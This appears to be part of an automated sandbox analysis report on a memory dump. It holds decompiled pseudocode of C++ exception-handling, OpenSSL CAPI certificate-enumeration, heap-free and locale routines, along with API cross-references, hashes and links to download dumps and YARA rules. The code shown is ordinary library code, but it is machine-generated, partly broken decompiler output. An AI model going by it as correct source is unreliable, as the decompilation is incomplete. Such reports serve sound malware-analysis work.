0x6e532b1c
0x6e532b1c
0x6e532b1f
0x6e532b1f
0x00000000
0x6e532ae3
0x6e532ae3
0x6e532ae4
0x6e532ae7
0x6e532aea
0x6e532aed
0x6e532aed
0x00000000
0x6e532af2
0x6e532a8e
0x6e532a80
0x6e532b22
0x6e532b25
0x6e532b26
0x6e532b29
0x6e532b2c
0x6e532b2f
0x6e532b32
0x6e532b32
0x6e532b3b
0x6e532b3e
0x6e532b3e
0x6e532a56
0x6e532b41
0x6e532b45
0x6e532b47
0x6e532b4a
0x6e532b50
0x6e532b50
0x6e532b58
0x6e532b5d
0x6e532bcb
0x6e532bcb
0x6e532bd0
0x6e532bd4
0x00000000
0x00000000
0x00000000
0x00000000
0x6e532b5f
0x6e532b5f
0x6e532b63
0x6e532b75
0x6e532b78
0x6e532b7b
0x6e532b7d
0x6e532b94
0x6e532b98
0x6e532b9e
0x6e532b9f
0x6e532ba1
0x00000000
0x6e532ba3
0x00000000
0x6e532ba3
0x6e532b7f
0x6e532b84
0x6e532b87
0x6e532b8c
0x6e532b8f
0x00000000
0x6e532b8f
0x6e532b65
0x6e532b68
0x6e532b6b
0x6e532b6d
0x00000000
0x6e532b6f
0x6e532b6f
0x6e532b73
0x00000000
0x00000000
0x00000000
0x00000000
0x6e532b73
0x6e532b6d
0x6e532b63
0x6e532a0d
0x6e532a0d
0x6e532a14
0x00000000
0x6e532a16
0x6e532a16
0x6e532a1d
0x00000000
0x00000000
0x00000000
0x00000000
0x6e532a1d
0x6e532a14
0x6e532a0b
0x6e5329fe
0x6e53297e
0x6e532986
0x6e532989
0x6e53298e
0x6e532992
0x6e532995
0x6e53299b
0x6e53299e
0x00000000
0x6e5329a0
0x6e5329a0
0x6e5329a3
0x6e5329a5
0x6e532bdb
0x6e532bdb
0x00000000
0x6e5329ab
0x6e5329b3
0x6e5329be
0x00000000
0x00000000
0x6e5329c7
0x6e5329ca
0x6e5329cb
0x6e5329ce
0x6e5329d0
0x00000000
0x6e5329d6
0x00000000
0x6e5329d6
0x00000000
0x6e5329d0
0x6e5329ab
0x6e532be0
0x6e532be0
0x6e532be2
0x6e532be3
0x6e532bea
0x6e532bed
0x6e532bfb
0x6e532c00
0x6e532c05
0x6e532c08
0x6e532c0d
0x6e532c10
0x6e532c13
0x6e532c15
0x6e532c17
0x6e532c17
0x6e532c1c
0x6e532c28
0x6e532c2e
0x6e532c33
0x6e532c36
0x6e532c37
0x00000000
0x6e532c37
0x6e53299e
0x6e53297c
0x6e53293c
0x6e53291d
0x6e53290f
0x6e5328db

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 6E532995
type_info::operator==.LIBVCRUNTIME ref: 6E5329B7
___TypeMatch.LIBVCRUNTIME ref: 6E532AC6
CatchIt.LIBVCRUNTIME ref: 6E532B17
IsInExceptionSpec.LIBVCRUNTIME ref: 6E532B98
_UnwindNestedFrames.LIBCMT ref: 6E532C1C
CallUnexpected.LIBVCRUNTIME ref: 6E532C37

Strings

csm, xrefs: 6E5328D5
csm, xrefs: 6E5329EE
csm, xrefs: 6E532942

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4234981820-393685449
Opcode ID: 91375e9820a6ff1c2b7f339a73000f314574246b227168ebf5eea381f7438c55
Instruction ID: dc6814c94c71a70d6781286dbbccebafb3115e128b547f7608bb747078f5eb23
Opcode Fuzzy Hash: 91375e9820a6ff1c2b7f339a73000f314574246b227168ebf5eea381f7438c55
Instruction Fuzzy Hash: 60B17B79800A29EFCF05CFE4C890AAEB7F9BF44314B20495AE9156B215E734DA52CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6E5856E0, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 168
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E6E5856E0(void* __ebx, void* __edi, void* __esi, void* __ebp, void* __fp0, signed int _a4, intOrPtr _a8, intOrPtr* _a12, signed int _a20, signed int _a28, signed int _a36, intOrPtr _a40, intOrPtr* _a44) {
				char _v8;
				signed int _v12;
				char _v24;
				intOrPtr* _v32;
				intOrPtr _v36;
				signed int _t24;
				void* _t27;
				signed int _t29;
				signed int _t34;
				signed int _t36;
				signed int _t44;
				signed int _t45;
				signed int _t51;
				signed int _t54;
				intOrPtr* _t57;
				intOrPtr _t66;
				signed int _t67;
				signed int _t68;
				signed int _t70;
				void* _t74;
				signed int _t75;
				signed int _t76;
				void* _t77;
				intOrPtr* _t80;
				signed int _t82;
				void* _t91;

				_t91 = __fp0;
				E6E52F9A0();
				_t24 =  *0x6e688c24; // 0x8e9367b0
				_a28 = _t24 ^ _t82;
				_t66 = _a40;
				_t57 = _a44;
				_t51 = _a36;
				_a4 = _t51;
				_a8 = _t66;
				_a12 = _t57;
				_t27 =  *((intOrPtr*)(_t51 + 0x20)) - 1;
				if(_t27 == 0) {
					__imp__CertFindCertificateInStore(1, 0, 0x70007, _t66, 0);
					__eflags = _a4 ^ _t82;
					return E6E52F227(_a4 ^ _t82, __esi, _t57);
				} else {
					_t29 = _t27 - 1;
					if(_t29 == 0) {
						__imp__CertEnumCertificatesInStore(_t57, 0, __edi, __esi, __ebp);
						_t70 = _t29;
						__eflags = _t70;
						if(_t70 == 0) {
							L19:
							_pop(_t74);
							__eflags = _a20 ^ _t82;
							return E6E52F227(_a20 ^ _t82, _t74);
						} else {
							_t80 = __imp__CertGetCertificateContextProperty;
							do {
								E6E584870(_t51, _t80, _t91);
								_t82 = _t82 + 8;
								_t34 =  *_t80(_t70, 0xb, 0,  &_v8, _t51, "capi_cert_get_fname\n");
								__eflags = _t34;
								if(_t34 == 0) {
									goto L18;
								} else {
									_push(0x534);
									_push("engines\\e_capi.c");
									_t34 = E6E55C790(_v24);
									_t75 = _t34;
									_t82 = _t82 + 0xc;
									__eflags = _t75;
									if(_t75 == 0) {
										goto L18;
									} else {
										_t36 =  *_t80(_t70, 0xb, _t75,  &_v24);
										__eflags = _t36;
										if(_t36 == 0) {
											_t37 =  *0x6e68e398;
											__eflags =  *0x6e68e398;
											if(__eflags == 0) {
												 *0x6e68e398 = E6E552AE0(_t57);
											}
											E6E552F50(_t51, _t57, _t80, __eflags, _t37, 0x63, 0x6f, "engines\\e_capi.c", 0x53d);
											_push(GetLastError());
											_push("%lX");
											_push(0xa);
											_push( &_v24);
											E6E55CB70(__eflags);
											_push( &_v24);
											_push("Error code= 0x");
											_push(2);
											E6E5525B0();
											_push(0x540);
											_push("engines\\e_capi.c");
											_t34 = E6E55C7C0(_t75);
											_t82 = _t82 + 0x3c;
											goto L18;
										} else {
											_t44 = E6E587B00(_t75);
											_push(0x53a);
											_push("engines\\e_capi.c");
											_t54 = _t44;
											_t34 = E6E55C7C0(_t75);
											_t82 = _t82 + 0x10;
											__eflags = _t54;
											if(_t54 == 0) {
												L17:
												_t51 = _v36;
												goto L18;
											} else {
												_t57 = _v32;
												_t45 = _t54;
												while(1) {
													_t67 =  *_t45;
													__eflags = _t67 -  *_t57;
													if(_t67 !=  *_t57) {
														break;
													}
													__eflags = _t67;
													if(_t67 == 0) {
														L14:
														_t76 = 0;
													} else {
														_t68 =  *((intOrPtr*)(_t45 + 1));
														__eflags = _t68 -  *((intOrPtr*)(_t57 + 1));
														if(_t68 !=  *((intOrPtr*)(_t57 + 1))) {
															break;
														} else {
															_t45 = _t45 + 2;
															_t57 = _t57 + 2;
															__eflags = _t68;
															if(_t68 != 0) {
																continue;
															} else {
																goto L14;
															}
														}
													}
													L16:
													_push(0x5bc);
													_push("engines\\e_capi.c");
													_t34 = E6E55C7C0(_t54);
													_t82 = _t82 + 0xc;
													__eflags = _t76;
													if(_t76 == 0) {
														_pop(_t77);
														__eflags = _v12 ^ _t82;
														return E6E52F227(_v12 ^ _t82, _t77);
													} else {
														goto L17;
													}
													goto L25;
												}
												asm("sbb esi, esi");
												_t76 = _t75 | 0x00000001;
												__eflags = _t76;
												goto L16;
											}
										}
									}
								}
								goto L25;
								L18:
								__imp__CertEnumCertificatesInStore(_v12, _t70);
								_t70 = _t34;
								__eflags = _t70;
							} while (_t70 != 0);
							goto L19;
						}
					} else {
						return E6E52F227(_a28 ^ _t82, __esi);
					}
				}
				L25:
			}

0x6e5856e0
0x6e5856e5
0x6e5856ea
0x6e5856f1
0x6e5856f5
0x6e5856f9
0x6e5856fe
0x6e585702
0x6e585706
0x6e58570a
0x6e585711
0x6e585714
0x6e5858c1
0x6e5858cc
0x6e5858d6
0x6e58571a
0x6e58571a
0x6e58571d
0x6e585737
0x6e58573d
0x6e58573f
0x6e585741
0x6e58581f
0x6e585820
0x6e585829
0x6e585833
0x6e585747
0x6e585747
0x6e585750
0x6e585756
0x6e58575b
0x6e585768
0x6e58576a
0x6e58576c
0x00000000
0x6e585772
0x6e585772
0x6e585777
0x6e585780
0x6e585785
0x6e585787
0x6e58578a
0x6e58578c
0x00000000
0x6e58578e
0x6e585797
0x6e585799
0x6e58579b
0x6e585834
0x6e585839
0x6e58583b
0x6e585842
0x6e585842
0x6e585856
0x6e585864
0x6e585865
0x6e58586e
0x6e585870
0x6e585871
0x6e58587a
0x6e58587b
0x6e585880
0x6e585882
0x6e585887
0x6e58588c
0x6e585892
0x6e585897
0x00000000
0x6e5857a1
0x6e5857a2
0x6e5857a7
0x6e5857ac
0x6e5857b2
0x6e5857b4
0x6e5857b9
0x6e5857bc
0x6e5857be
0x6e585806
0x6e585806
0x00000000
0x6e5857c0
0x6e5857c0
0x6e5857c4
0x6e5857c6
0x6e5857c6
0x6e5857c8
0x6e5857ca
0x00000000
0x00000000
0x6e5857cc
0x6e5857ce
0x6e5857e2
0x6e5857e2
0x6e5857d0
0x6e5857d0
0x6e5857d3
0x6e5857d6
0x00000000
0x6e5857d8
0x6e5857d8
0x6e5857db
0x6e5857de
0x6e5857e0
0x00000000
0x00000000
0x00000000
0x00000000
0x6e5857e0
0x6e5857d6
0x6e5857eb
0x6e5857eb
0x6e5857f0
0x6e5857f6
0x6e5857fb
0x6e5857fe
0x6e585800
0x6e5858a2
0x6e5858a9
0x6e5858b3
0x00000000
0x00000000
0x00000000
0x00000000
0x6e585800
0x6e5857e6
0x6e5857e8
0x6e5857e8
0x00000000
0x6e5857e8
0x6e5857be
0x6e58579b
0x6e58578c
0x00000000
0x6e58580a
0x6e58580f
0x6e585815
0x6e585817
0x6e585817
0x00000000
0x6e585750
0x6e58571f
0x6e585730
0x6e585730
0x6e58571d
0x00000000

APIs

CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 6E585737
CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000,?), ref: 6E585768
CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000,?), ref: 6E585797
CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 6E58580F
CertFindCertificateInStore.CRYPT32(?,00000001,00000000,00070007,?,00000000), ref: 6E5858C1

Strings

Error code= 0x, xrefs: 6E58587B
engines\e_capi.c, xrefs: 6E585777, 6E5857AC, 6E5857F0, 6E58584C, 6E58588C
capi_cert_get_fname, xrefs: 6E585750
%lX, xrefs: 6E585865

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: Cert$CertificateStore$CertificatesContextEnumProperty$Find
String ID: %lX$Error code= 0x$capi_cert_get_fname$engines\e_capi.c
API String ID: 3601032570-541149528
Opcode ID: 5504a8b717aa4cfd7f43db171edfc6b2fd49f16aa4c77f276eb0d0564b403317
Instruction ID: cc84037f5b6f16243303ae0cb4a51b0de1b4b0fb33c8ffd58a13f3d2e2f6fff2
Opcode Fuzzy Hash: 5504a8b717aa4cfd7f43db171edfc6b2fd49f16aa4c77f276eb0d0564b403317
Instruction Fuzzy Hash: 90415B35604311ABD311DBE5AC92F7B7BE9AFDA704F50482DFA46DA381E722C904CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E540F94, Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6E540F94(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0x6e6268a0;
				if(_t68 != 0x6e6268a0) {
					E6E541B83(_t68);
					_t36 = _a4;
				}
				E6E541B83( *((intOrPtr*)(_t36 + 0x3c)));
				E6E541B83( *((intOrPtr*)(_a4 + 0x30)));
				E6E541B83( *((intOrPtr*)(_a4 + 0x34)));
				E6E541B83( *((intOrPtr*)(_a4 + 0x38)));
				E6E541B83( *((intOrPtr*)(_a4 + 0x28)));
				E6E541B83( *((intOrPtr*)(_a4 + 0x2c)));
				E6E541B83( *((intOrPtr*)(_a4 + 0x40)));
				E6E541B83( *((intOrPtr*)(_a4 + 0x44)));
				E6E541B83( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E6E540DC0(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E6E540E2B(_t67, _t72, _t73, _t77);
			}

0x6e540f94
0x6e540f94
0x6e540f94
0x6e540f99
0x6e540f9f
0x6e540fa1
0x6e540fa7
0x6e540faa
0x6e540faf
0x6e540fb2
0x6e540fb6
0x6e540fc1
0x6e540fcc
0x6e540fd7
0x6e540fe2
0x6e540fed
0x6e540ff8
0x6e541003
0x6e541011
0x6e54101c
0x6e541024
0x6e541025
0x6e541028
0x6e54102e
0x6e541032
0x6e541036
0x6e541037
0x6e541041
0x6e541047
0x6e541048
0x6e54104b
0x6e541051
0x6e541055
0x6e541059
0x6e541060

APIs

_free.LIBCMT ref: 6E540FAA

Part of subcall function 6E541B83: HeapFree.KERNEL32(00000000,00000000,?,6E54DAF8,6E4F6ECF,00000000,6E4F6ECF,?,?,6E54DD9B,6E4F6ECF,00000007,6E4F6ECF,?,6E54B969,6E4F6ECF), ref: 6E541B99
Part of subcall function 6E541B83: GetLastError.KERNEL32(6E4F6ECF,?,6E54DAF8,6E4F6ECF,00000000,6E4F6ECF,?,?,6E54DD9B,6E4F6ECF,00000007,6E4F6ECF,?,6E54B969,6E4F6ECF,6E4F6ECF), ref: 6E541BAB

_free.LIBCMT ref: 6E540FB6
_free.LIBCMT ref: 6E540FC1
_free.LIBCMT ref: 6E540FCC
_free.LIBCMT ref: 6E540FD7
_free.LIBCMT ref: 6E540FE2
_free.LIBCMT ref: 6E540FED
_free.LIBCMT ref: 6E540FF8
_free.LIBCMT ref: 6E541003
_free.LIBCMT ref: 6E541011

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d57ea5e671d53176d10d687cd8b8b08778dcf6bba794bb15f91d2bb43efeb2d6
Instruction ID: fe066c38474891272ff5e44259972ed3c4523428ce9054868f319689cf97e88e
Opcode Fuzzy Hash: d57ea5e671d53176d10d687cd8b8b08778dcf6bba794bb15f91d2bb43efeb2d6
Instruction Fuzzy Hash: CB21A37690420CEFCB41DFE4CA80EDE7BF9AF48754F0055A6A6159B120EB71EA588BC0

Uniqueness

Uniqueness Score: -1.00%

Function 6E54366F, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E6E54366F(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v60;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				short _v454;
				intOrPtr _v456;
				signed int _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v512;
				char _v536;
				intOrPtr _v540;
				signed int _v544;
				intOrPtr _v548;
				signed int _v560;
				char _v708;
				signed int _v712;
				short _v714;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int _v732;
				intOrPtr _v736;
				signed int* _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v824;
				char _v1252;
				char _v1268;
				intOrPtr _v1284;
				signed int _v1288;
				intOrPtr _v1324;
				signed int _v1336;
				void* __ebp;
				signed int _t251;
				void* _t254;
				signed int _t257;
				signed int _t259;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t272;
				signed int _t274;
				void* _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				signed int _t281;
				signed int _t284;
				signed int _t291;
				signed int _t294;
				signed int _t295;
				intOrPtr _t296;
				signed int _t299;
				signed int _t301;
				signed int _t302;
				signed int _t305;
				signed int _t307;
				signed int _t310;
				signed int _t311;
				signed int _t313;
				signed int _t331;
				signed int _t333;
				signed int _t335;
				signed int _t339;
				void* _t341;
				signed int _t343;
				void* _t344;
				intOrPtr _t345;
				signed int _t350;
				signed int _t351;
				intOrPtr* _t356;
				signed int _t370;
				signed int _t372;
				signed int _t374;
				intOrPtr* _t375;
				signed int _t377;
				void* _t382;
				intOrPtr* _t387;
				intOrPtr* _t390;
				void* _t393;
				signed int _t394;
				intOrPtr* _t397;
				intOrPtr* _t398;
				char* _t405;
				intOrPtr _t409;
				intOrPtr* _t410;
				signed int _t412;
				signed int _t417;
				signed int _t418;
				intOrPtr* _t422;
				intOrPtr* _t423;
				signed int _t432;
				short _t433;
				void* _t434;
				void* _t436;
				signed int _t437;
				signed int _t439;
				intOrPtr _t440;
				signed int _t443;
				intOrPtr _t444;
				signed int _t446;
				signed int _t449;
				intOrPtr _t455;
				signed int _t456;
				void* _t457;
				signed int _t458;
				signed int _t459;
				void* _t461;
				signed int _t463;
				signed int _t465;
				signed int _t468;
				signed int* _t469;
				short _t470;
				signed int _t472;
				signed int _t473;
				void* _t475;
				void* _t476;
				signed int _t477;
				void* _t478;
				void* _t479;
				signed int _t480;
				void* _t482;
				void* _t483;
				signed int _t495;

				_t431 = __edx;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t370 = E6E541BBD(0x6a6);
				_t250 = 0;
				_pop(_t382);
				if(_t370 == 0) {
					L20:
					return _t250;
				} else {
					_push(__edi);
					 *_t370 = 1;
					_t439 = _t370 + 4;
					_t455 = _a4;
					 *_t439 = 0;
					_t251 = _t455 + 0x30;
					_push( *_t251);
					_v16 = _t251;
					_push(0x6e626be8);
					_push( *0x6e626b24);
					E6E5435AB(_t370, _t382, __edx, _t439, _t455, _t439, 0x351, 3);
					_t476 = _t475 + 0x18;
					_v8 = 0x6e626b24;
					while(1) {
						L2:
						_t254 = E6E54DEE1(_t439, 0x351, 0x6e626be4);
						_t477 = _t476 + 0xc;
						if(_t254 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t422 = _t8;
							_t350 =  *_v16;
							_v16 = _t422;
							_t423 =  *_t422;
							_v20 = _t423;
							goto L4;
						}
						while(1) {
							L4:
							_t431 =  *_t350;
							if(_t431 !=  *_t423) {
								break;
							}
							if(_t431 == 0) {
								L8:
								_t351 = 0;
							} else {
								_t431 =  *((intOrPtr*)(_t350 + 2));
								if(_t431 !=  *((intOrPtr*)(_t423 + 2))) {
									break;
								} else {
									_t350 = _t350 + 4;
									_t423 = _t423 + 4;
									if(_t431 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							_push(_v20);
							_push(0x6e626be8);
							asm("sbb eax, eax");
							_v12 = _v12 &  !( ~_t351);
							_t356 = _v8 + 0xc;
							_v8 = _t356;
							_push( *_t356);
							E6E5435AB(_t370, _t423, _t431, _t439, _t455, _t439, 0x351, 3);
							_t476 = _t477 + 0x18;
							if(_v8 < 0x6e626b54) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E6E541B83(_t370);
									_t446 = _t439 | 0xffffffff;
									__eflags =  *(_t455 + 0x28);
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											E6E541B83( *(_t455 + 0x28));
										}
									}
									__eflags =  *(_t455 + 0x24);
									if( *(_t455 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t446 == 1;
										if(_t446 == 1) {
											E6E541B83( *(_t455 + 0x24));
										}
									}
									 *(_t455 + 0x24) = 0;
									 *(_t455 + 0x1c) = 0;
									 *(_t455 + 0x28) = 0;
									 *((intOrPtr*)(_t455 + 0x20)) = 0;
									_t250 =  *((intOrPtr*)(_t455 + 0x40));
								} else {
									_t449 = _t439 | 0xffffffff;
									_t495 =  *(_t455 + 0x28);
									if(_t495 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t495 == 0) {
											E6E541B83( *(_t455 + 0x28));
										}
									}
									if( *(_t455 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										if(_t449 == 1) {
											E6E541B83( *(_t455 + 0x24));
										}
									}
									 *(_t455 + 0x24) =  *(_t455 + 0x24) & 0x00000000;
									_t250 = _t370 + 4;
									 *(_t455 + 0x1c) =  *(_t455 + 0x1c) & 0x00000000;
									 *(_t455 + 0x28) = _t370;
									 *((intOrPtr*)(_t455 + 0x20)) = _t250;
								}
								goto L20;
							}
							goto L136;
						}
						asm("sbb eax, eax");
						_t351 = _t350 | 0x00000001;
						__eflags = _t351;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6E53498C();
					asm("int3");
					_t472 = _t477;
					_t478 = _t477 - 0x1d0;
					_t257 =  *0x6e688c24; // 0x8e9367b0
					_v60 = _t257 ^ _t472;
					_t259 = _v44;
					_push(_t370);
					_push(_t455);
					_t44 =  &_v40; // 0x6e542de9
					_t456 =  *_t44;
					_push(_t439);
					_t440 = _v48;
					_v512 = _t440;
					__eflags = _t259;
					if(_t259 == 0) {
						_v460 = 1;
						_v472 = 0;
						_t372 = 0;
						_v452 = 0;
						__eflags = _t456;
						if(__eflags == 0) {
							L80:
							E6E54366F(_t372, _t431, _t440, _t456, __eflags, _t440);
							goto L81;
						} else {
							__eflags =  *_t456 - 0x4c;
							if( *_t456 != 0x4c) {
								L60:
								_t266 = E6E5431E5(_t372, _t431, _t440, _t456, _t456,  &_v276, 0x83,  &_v448, 0x55,  &_v468);
								_t479 = _t478 + 0x18;
								__eflags = _t266;
								if(_t266 != 0) {
									__eflags = 0;
									_t432 = _t440 + 0x20;
									_t458 = 0;
									_v452 = _t432;
									do {
										__eflags = _t458;
										if(_t458 == 0) {
											L75:
											_t267 = _v460;
										} else {
											_t387 =  *_t432;
											_t268 =  &_v276;
											while(1) {
												__eflags =  *_t268 -  *_t387;
												_t440 = _v464;
												if( *_t268 !=  *_t387) {
													break;
												}
												__eflags =  *_t268;
												if( *_t268 == 0) {
													L68:
													_t269 = 0;
												} else {
													_t433 =  *((intOrPtr*)(_t268 + 2));
													__eflags = _t433 -  *((intOrPtr*)(_t387 + 2));
													_v454 = _t433;
													_t432 = _v452;
													if(_t433 !=  *((intOrPtr*)(_t387 + 2))) {
														break;
													} else {
														_t268 = _t268 + 4;
														_t387 = _t387 + 4;
														__eflags = _v454;
														if(_v454 != 0) {
															continue;
														} else {
															goto L68;
														}
													}
												}
												L70:
												__eflags = _t269;
												if(_t269 == 0) {
													_t372 = _t372 + 1;
													__eflags = _t372;
													goto L75;
												} else {
													_t270 =  &_v276;
													_push(_t270);
													_push(_t458);
													_push(_t440);
													L84();
													_t432 = _v452;
													_t479 = _t479 + 0xc;
													__eflags = _t270;
													if(_t270 == 0) {
														_t267 = 0;
														_v460 = 0;
													} else {
														_t372 = _t372 + 1;
														goto L75;
													}
												}
												goto L76;
											}
											asm("sbb eax, eax");
											_t269 = _t268 | 0x00000001;
											__eflags = 0;
											goto L70;
										}
										L76:
										_t458 = _t458 + 1;
										_t432 = _t432 + 0x10;
										_v452 = _t432;
										__eflags = _t458 - 5;
									} while (_t458 <= 5);
									__eflags = _t267;
									if(__eflags != 0) {
										goto L80;
									} else {
										__eflags = _t372;
										if(__eflags != 0) {
											goto L80;
										} else {
										}
									}
								}
								goto L81;
							} else {
								__eflags =  *(_t456 + 2) - 0x43;
								if( *(_t456 + 2) != 0x43) {
									goto L60;
								} else {
									__eflags =  *((short*)(_t456 + 4)) - 0x5f;
									if( *((short*)(_t456 + 4)) != 0x5f) {
										goto L60;
									} else {
										while(1) {
											_t272 = E6E54E177(_t456, 0x6e626bdc);
											_t374 = _t272;
											_v468 = _t374;
											_pop(_t389);
											__eflags = _t374;
											if(_t374 == 0) {
												break;
											}
											_t274 = _t272 - _t456;
											__eflags = _t274;
											_v460 = _t274 >> 1;
											if(_t274 == 0) {
												break;
											} else {
												_t276 = 0x3b;
												__eflags =  *_t374 - _t276;
												if( *_t374 == _t276) {
													break;
												} else {
													_t443 = _v460;
													_t375 = 0x6e626b24;
													_v456 = 1;
													do {
														_t277 = E6E53F42A( *_t375, _t456, _t443);
														_t478 = _t478 + 0xc;
														__eflags = _t277;
														if(_t277 != 0) {
															goto L46;
														} else {
															_t390 =  *_t375;
															_t434 = _t390 + 2;
															do {
																_t345 =  *_t390;
																_t390 = _t390 + 2;
																__eflags = _t345 - _v472;
															} while (_t345 != _v472);
															_t389 = _t390 - _t434 >> 1;
															__eflags = _t443 - _t390 - _t434 >> 1;
															if(_t443 != _t390 - _t434 >> 1) {
																goto L46;
															}
														}
														break;
														L46:
														_v456 = _v456 + 1;
														_t375 = _t375 + 0xc;
														__eflags = _t375 - 0x6e626b54;
													} while (_t375 <= 0x6e626b54);
													_t372 = _v468 + 2;
													_t278 = E6E54E11E(_t389, _t372, 0x6e626be4);
													_t440 = _v464;
													_t459 = _t278;
													_pop(_t393);
													__eflags = _t459;
													if(_t459 != 0) {
														L49:
														__eflags = _v456 - 5;
														if(_v456 > 5) {
															_t394 = _v452;
															goto L55;
														} else {
															_push(_t459);
															_t281 = E6E54E113( &_v276, 0x83, _t372);
															_t480 = _t478 + 0x10;
															__eflags = _t281;
															if(_t281 != 0) {
																L83:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E6E53498C();
																asm("int3");
																_push(_t472);
																_t473 = _t480;
																_t284 =  *0x6e688c24; // 0x8e9367b0
																_v560 = _t284 ^ _t473;
																_push(_t372);
																_t377 = _v544;
																_push(_t459);
																_push(_t440);
																_t444 = _v548;
																_v1288 = _t377;
																_v1284 = E6E5410D8(_t393, _t431) + 0x278;
																_t291 = E6E5431E5(_t377, _t431, _t444, _v540, _v540,  &_v824, 0x83,  &_v1252, 0x55,  &_v1268);
																_t482 = _t480 - 0x2e4 + 0x18;
																__eflags = _t291;
																if(_t291 == 0) {
																	L124:
																	__eflags = 0;
																	goto L125;
																} else {
																	_t103 = _t377 + 2; // 0x3
																	_t463 = _t103 << 4;
																	__eflags = _t463;
																	_t294 =  &_v280;
																	_v720 = _t463;
																	_t397 =  *((intOrPtr*)(_t463 + _t444));
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t294 -  *_t397;
																		_t465 = _v720;
																		if( *_t294 !=  *_t397) {
																			break;
																		}
																		__eflags =  *_t294;
																		if( *_t294 == 0) {
																			L91:
																			_t295 = _v712;
																		} else {
																			_t470 =  *((intOrPtr*)(_t294 + 2));
																			__eflags = _t470 -  *((intOrPtr*)(_t397 + 2));
																			_v714 = _t470;
																			_t465 = _v720;
																			if(_t470 !=  *((intOrPtr*)(_t397 + 2))) {
																				break;
																			} else {
																				_t294 = _t294 + 4;
																				_t397 = _t397 + 4;
																				__eflags = _v714;
																				if(_v714 != 0) {
																					continue;
																				} else {
																					goto L91;
																				}
																			}
																		}
																		L93:
																		__eflags = _t295;
																		if(_t295 != 0) {
																			_t398 =  &_v280;
																			_t436 = _t398 + 2;
																			do {
																				_t296 =  *_t398;
																				_t398 = _t398 + 2;
																				__eflags = _t296 - _v712;
																			} while (_t296 != _v712);
